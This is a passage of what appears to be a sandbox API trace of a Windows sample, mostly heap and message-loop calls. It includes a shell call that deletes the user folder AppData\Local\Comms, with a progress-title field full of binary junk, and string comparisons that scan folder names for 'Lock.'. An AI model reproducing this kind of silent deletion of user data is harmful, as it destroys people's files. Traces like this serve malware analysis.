lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0155.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0155.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0155.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0155.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0155.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0155.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0155.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5db10 [0155.164] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Comms", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpFilePart=0x8cf650*="Comms") returned 0x23 [0155.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5db10 | out: hHeap=0x2af0000) returned 1 [0155.164] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Comms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\comms")) returned 0x10 [0155.164] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0156.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0156.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0156.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0156.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0156.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0156.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.322] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0156.322] TranslateMessage (lpMsg=0x8cf968) returned 0 [0156.322] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0156.323] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0156.323] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0156.323] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0156.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0156.323] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0156.323] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0156.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0156.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0156.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0156.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ConnectedDevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onnectedDevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0156.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nnectedDevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0156.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nectedDevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0156.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ectedDevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctedDevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tedDevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="edDevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dDevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DevicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="evicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vicesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cesPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sPlatform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Platform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0156.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tform", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0156.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0156.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0156.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0156.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0156.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0156.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0156.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0156.324] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0156.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0156.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0156.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0156.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0156.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0156.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0156.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0156.325] RtlAllocateHeap 